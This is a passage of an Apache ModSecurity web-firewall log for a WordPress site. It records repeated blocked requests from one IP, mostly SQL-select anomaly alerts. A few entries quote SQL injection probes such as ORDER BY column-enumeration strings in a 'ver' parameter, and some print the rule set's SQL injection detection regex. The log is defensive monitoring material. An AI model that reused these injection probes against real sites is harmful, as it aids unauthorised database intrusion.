"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfKg1rY6w-xq1eShSYwAAAEI"] [Fri Jul 12 08:37:00.967642 2024] [:error] [pid 29519:tid 139783932823296] [client 141.98.81.44:38242] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfDEhNOprNgeRyDcQBQAAAIA"] [Fri Jul 12 08:37:01.373337 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38244] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfRoAeojmxWlFps7w1AAAAM4"] [Fri Jul 12 08:37:01.748920 2024] [:error] [pid 30143:tid 139783753930496] [client 141.98.81.44:38246] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfRoAeojmxWlFps7w1QAAAM0"] [Fri Jul 12 08:37:02.142334 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38248] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfhoAeojmxWlFps7w1gAAANE"] [Fri Jul 12 08:37:02.442117 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:38250] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfhoAeojmxWlFps7w1wAAAM8"] [Fri Jul 12 08:37:02.791806 2024] [:error] [pid 29518:tid 139783899252480] [client 141.98.81.44:38252] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfqg1rY6w-xq1eShSZAAAAEQ"] [Fri Jul 12 08:37:03.214417 2024] [:error] [pid 29519:tid 139783661610752] [client 141.98.81.44:38254] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfzEhNOprNgeRyDcQBgAAAJg"] [Fri Jul 12 08:37:03.701048 2024] [:error] [pid 29519:tid 139783703574272] [client 141.98.81.44:38256] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfzEhNOprNgeRyDcQBwAAAJM"] [Fri Jul 12 08:37:03.957854 2024] [:error] [pid 29519:tid 139783745537792] [client 141.98.81.44:38258] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfzEhNOprNgeRyDcQCAAAAI4"] [Fri Jul 12 08:37:04.244297 2024] [:error] [pid 29519:tid 139783728752384] [client 141.98.81.44:38260] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgDEhNOprNgeRyDcQCQAAAJA"] [Fri Jul 12 08:37:04.678877 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:38262] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgBoAeojmxWlFps7w2AAAAME"] [Fri Jul 12 08:37:05.002130 2024] [:error] [pid 30143:tid 139783711966976] [client 141.98.81.44:38266] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgRoAeojmxWlFps7w2QAAANI"] [Fri Jul 12 08:37:05.345017 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:38268] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgRoAeojmxWlFps7w2gAAANg"] [Fri Jul 12 08:37:05.745884 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:38270] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgRoAeojmxWlFps7w2wAAANQ"] [Fri Jul 12 08:37:06.105536 2024] [:error] [pid 30143:tid 139783795894016] [client 141.98.81.44:38272] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExghoAeojmxWlFps7w3AAAAMg"] [Fri Jul 12 08:37:06.388823 2024] [:error] [pid 30143:tid 139783787501312] [client 141.98.81.44:38274] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExghoAeojmxWlFps7w3QAAAMk"] [Fri Jul 12 08:37:06.759323 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:38276] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExghoAeojmxWlFps7w3gAAAMU"] [Fri Jul 12 08:37:07.074033 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:38278] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgxoAeojmxWlFps7w3wAAAMw"] [Fri Jul 12 08:37:07.476132 2024] [:error] [pid 29519:tid 139783737145088] [client 141.98.81.44:38280] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgzEhNOprNgeRyDcQCgAAAI8"] [Fri Jul 12 08:37:07.818712 2024] [:error] [pid 30143:tid 139783882467072] [client 141.98.81.44:38282] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExgxoAeojmxWlFps7w4AAAAMY"] [Fri Jul 12 08:37:08.250087 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:38284] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhBoAeojmxWlFps7w4QAAAMc"] [Fri Jul 12 08:37:08.606955 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38286] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhBoAeojmxWlFps7w4gAAAM4"] [Fri Jul 12 08:37:08.964494 2024] [:error] [pid 29519:tid 139783670003456] [client 141.98.81.44:38288] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhDEhNOprNgeRyDcQCwAAAJc"] [Fri Jul 12 08:37:09.245649 2024] [:error] [pid 29519:tid 139783695181568] [client 141.98.81.44:38290] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhTEhNOprNgeRyDcQDAAAAJQ"] [Fri Jul 12 08:37:09.700268 2024] [:error] [pid 30143:tid 139783703574272] [client 141.98.81.44:38292] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhRoAeojmxWlFps7w4wAAANM"] [Fri Jul 12 08:37:09.974949 2024] [:error] [pid 30143:tid 139783686788864] [client 141.98.81.44:38294] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhRoAeojmxWlFps7w5AAAANU"] [Fri Jul 12 08:37:10.347295 2024] [:error] [pid 30143:tid 139783670003456] [client 141.98.81.44:38296] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhhoAeojmxWlFps7w5QAAANc"] [Fri Jul 12 08:37:10.712480 2024] [:error] [pid 30143:tid 139783711966976] [client 141.98.81.44:38298] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhhoAeojmxWlFps7w5gAAANI"] [Fri Jul 12 08:37:11.062034 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:38300] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhxoAeojmxWlFps7w5wAAANg"] [Fri Jul 12 08:37:11.397578 2024] [:error] [pid 29519:tid 139783686788864] [client 141.98.81.44:38302] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 